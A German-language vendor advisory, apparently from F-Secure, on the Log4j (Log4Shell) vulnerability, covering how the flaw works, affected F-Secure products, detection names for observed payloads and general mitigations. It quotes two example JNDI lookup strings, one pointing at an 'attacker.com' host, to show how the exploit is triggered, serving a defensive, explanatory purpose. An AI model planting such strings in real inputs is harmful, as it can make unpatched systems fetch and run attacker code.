Log4j-Alarm: das sagt F-Secure zur Sicherheitslücke

Log4j Log4shell

Beitrag teilen

Eine Sicherheitslücke in der Log4J library, die am Freitag, den 10. Dezember, entdeckt wurde, erschüttert Softwarehersteller und Dienstanbieter rund um den Globus. Die Schwachstelle in der standardisierten Methode zur Verarbeitung von Protokollnachrichten in Software von Microsofts Minecraft bis hin zu E-Commerce-Plattformen wird bereits von Angreifern attackiert.

Es ist fast unmöglich, das Ausmaß des Risikos zu beschreiben, das derzeit in anfälligen Anwendungen besteht. Wenn eine vom Benutzer kontrollierte Zeichenfolge, die auf die Schwachstelle abzielt, protokolliert wird, kann die Schwachstelle aus der Ferne ausgeführt werden. Vereinfacht ausgedrückt, kann ein Angreifer diese Schwachstelle nutzen, um das Zielsystem dazu zu bringen, Code von einem entfernten Standort abzurufen und auszuführen. Im zweiten Schritt bleibt es dem Angreifer überlassen, was der schadhafte Code anrichten soll.

Ein “fast perfekter Sturm“

Diese Sicherheitslücke zeigt, wie schwierig es ist, Unternehmenssoftware auf mehreren Ebenen zu sichern. Veraltete Software, einschließlich älterer Java-Versionen, zwingt viele Unternehmen dazu, ihre eigenen Patches zu entwickeln oder sie daran zu hindern, sie sofort zu patchen. Eine weitere Komplikation ergibt sich aus der Herausforderung, die Protokollierungsfunktionen von Log4j in Echtzeit zu patchen, gerade wenn die Bedrohung durch Angriffe so hoch und die Protokollierung so wichtig ist.

Alle empfohlenen Gegenmaßnahmen sollten “sofort” umgesetzt werden, schreibt die Cybersecurity & Infrastructure Security Agency in einem Blogbeitrag.

Einzelne Nutzer können nicht viel tun, außer Updates für verschiedene Online-Dienste zu installieren, sobald sie verfügbar sind. Und das sollte sofort geschehen. Firmen und Unternehmen werden ununterbrochen daran arbeiten, Patches bereitzustellen, während sie ihre eigenen Systeme absichern. Danach wird es wichtig sein festzustellen, ob ein aktiver Sicherheitsvorfall in den betroffenen Systemen im Gange ist.

Sicherheitslücken nahezu überall

Es kann schwieriger sein, eine Anwendung zu finden, die die Log4J Library nicht nutzt, als eine, die sie nutzt. Diese Omnipräsenz bedeutet, dass Angreifer fast überall nach Schwachstellen suchen können.

“Bitte ändern Sie den Namen Ihres Tesla oder iPhones NICHT in ${jndi:ldap://url/a}, es sei denn, Sie wollen ein unerwartetes Ereignis”, sagt Erka Koivunen, Chief Information Security Officer bei F-Secure, scherzhaft.

Die Verwendung der Formatierungssprache von Log4J könnte Schadsoftware in anfälligen Anwendungen auslösen. Wie wir wissen, kann allein die Erwähnung eines Satzes wie ${jndi:ldap://attacker.com/pwnyourserver} beispielsweise in einem Minecraft-Chat in einem ungepatchten System einen Sicherheitssturm bei Microsoft auslösen.

Sind F-Secure-Produkte betroffen?

F-Secure hat festgestellt, dass die folgenden Produkte von dieser Sicherheitslücke betroffen sind:

  • F-Secure Policy Manager
  • F-Secure Policy Manager Proxy
  • F-Secure Endpoint Proxy
  • F-Secure Elements Connector

Sowohl Windows- als auch Linux-Versionen dieser Produkte sind betroffen und sollten sofort gepatcht werden.

Wie kann ich mein F-Secure-Produkt patchen?

Für diese Sicherheitslücke haben wir ein Sicherheits-Patch entwickelt. Aktuelles und Updates zu dieser Sicherheitslücke werden laufend in unserer Community Seite veröffentlicht

Welchen Schutz bietet F-Secure gegen diese Sicherheitslücke?

F-Secure Endpoint Protection (EPP) wird laufend mit Erkennungen für die neuesten lokalen Exploit-Dateien aktualisiert, aber angesichts der vielen Möglichkeiten, wie eine Sicherheitslücke ausgenutzt werden kann, deckt dies nur einen Teil des Problems ab.

EPP-Erkennungen befassen sich wie üblich mit jeder Nutzlast, die in der Phase nach der Ausnutzung gesehen wird. Zum jetzigen Zeitpunkt hat F-Secure die folgenden Erkennungen durchgeführt, die einige ernsthafte Angriffsszenarien abdecken. Dabei handelt es sich um bösartige Payloads, die wir in Verbindung mit Log4j-Exploits beobachtet haben.

  • TR/Drop.Cobacis.AL
  • TR/Rozena.wrdej
  • TR/PShell.Agent.SWR
  • TR/Coblat.G1
  • TR/AD.MeterpreterSC.rywng

Viele dieser Erkennungen sind bereits seit Monaten in F-Secure EPP verfügbar, was bedeutet, dass die Kunden proaktiv vor diesen Payloads geschützt sind.

Andere vorhandene Erkennungen können ebenfalls hilfreich sein, da es mehrere Möglichkeiten gibt, den Exploit zu nutzen. Diese Liste mit nützlichen Erkennungen wird laufend aktualisiert, wenn sich die Situation weiterentwickelt. In den allgemeinen Empfehlungen im folgenden Abschnitt finden Sie weitere Abhilfemaßnahmen.

Welche Maßnahmen sollten Sie generell bei jeder Software ergreifen, unabhängig vom Hersteller?

  • Schränken Sie den Netzwerkzugang ein oder beschränken Sie ihn auf vertrauenswürdige Sites. Wenn Ihr System keine Verbindung zum Internet herstellen kann, um den bösartigen Code abzurufen, wird der Angriff fehlschlagen.
  • Erkundigen Sie sich regelmäßig bei den Anbietern, ob es Informationen über Patches und andere Abhilfemaßnahmen für Sicherheitslücken gibt.
  • F-Secure Elements Vulnerability Management kann bei der Identifizierung anfälliger Systeme helfen.
  • Die Produkte F-Secure Elements Endpoint Protection oder F-Secure Business Suite können die anfällige Software auf dem System, auf dem sie installiert sind, erkennen und patchen.

F-Secure hält alle Kunden und Nutzer auch permanent auf dem Laufenden.

Mehr bei F-Secure.com

 


Über F-Secure

Niemand hat einen besseren Einblick in echte Cyberangriffe als F-Secure. Wir schließen die Lücke zwischen Erkennung und Reaktion. Zu diesem Zweck nutzen wir die unübertroffene Bedrohungsexpertise von Hunderten der besten technischen Berater unserer Branche, Daten von Millionen von Geräten, die unsere preisgekrönte Software nutzen, sowie fortlaufende Innovationen im Bereich der künstlichen Intelligenz. Führende Banken, Fluggesellschaften und Unternehmen vertrauen auf unser Engagement bei der Bekämpfung der gefährlichsten Cyberbedrohungen der Welt. Zusammen mit unserem Netzwerk an Top-Channel-Partnern und über 200 Serviceanbietern ist es unsere Mission, all unseren Kunden maßgeschneiderte unternehmensfähige Cybersicherheit zur Verfügung zu stellen. F-Secure wurde 1988 gegründet und ist an der NASDAQ OMX Helsinki Ltd gelistet.


 

Passende Artikel zum Thema

SIEM-Lösung mit mehr Automatisierung

Mit dem Motto weniger Routine, dafür mehr Automatisierung hat Kaspersky seine SIEM-Lösung um neue Funktionen erweitert. Schnellere Bedrohungserkennung, mehr Automatisierung und ➡ Weiterlesen

Drei Viertel der Opfer von Ransomware zahlen Lösegeld

Eine internationale Umfrage unter 900 IT- und Security-Verantwortlichen zeigt, dass 83 Prozent der Unternehmen im vergangenen Jahr Ziel von Ransomware-Angriffen ➡ Weiterlesen

Risiken für SaaS-Daten durch Cyberangriffe

Statista zufolge nutzen 70 Prozent der Unternehmen mit bis zu 500 Mitarbeitern SaaS beziehungsweise auf Cloud-Computing basierende Anwendungssoftware. Insgesamt haben ➡ Weiterlesen

Narrative Angriffe: Falsche Fakten, echte Folgen

Die Gefahr ist diffus und schwer greifbar: Während sich Unternehmen zunehmend in der komplexen Landschaft von Cyberangriffen zurechtfinden müssen, erweisen ➡ Weiterlesen

Sichere digitale Identität sichert digitales Vertrauen

Durch eine dezentrale Public Key-Infrastruktur (PKI) bringen Unternehmens unterschiedliche Verfahren zur Anwendung. Eine zentrale Nachverfolgung der Zertifizierungen findet nicht statt. ➡ Weiterlesen

TotalAI-Plattform: Schwachstellenbewertung von KI-Workloads

Die neue Lösung TotalAI ermöglicht eine ganzheitliche Erkennung und Schwachstellenbewertung von KI-Workloads, um Datenlecks, Injektionsprobleme und Modelldiebstahl zu erkennen. Die ➡ Weiterlesen

Microsoft 365 Backup Storage optimiert Datensicherheit

Ein weiterer Cybersicherheitsanbieter integriert Microsoft 365 Backup Storage in seine Cloud-Plattform. Damit lassen sich Backups kostengünstig überwachen und verwalten sowie ➡ Weiterlesen

Cisco-Lizenzierungstool mit kritischen 9.8 Schwachstellen

Cisco meldet kritische Schwachstellen in der Cisco Smart Licensing Utility die einen CVSS Score 9.8 von 10 erreichen. Diese Schwachstellen ➡ Weiterlesen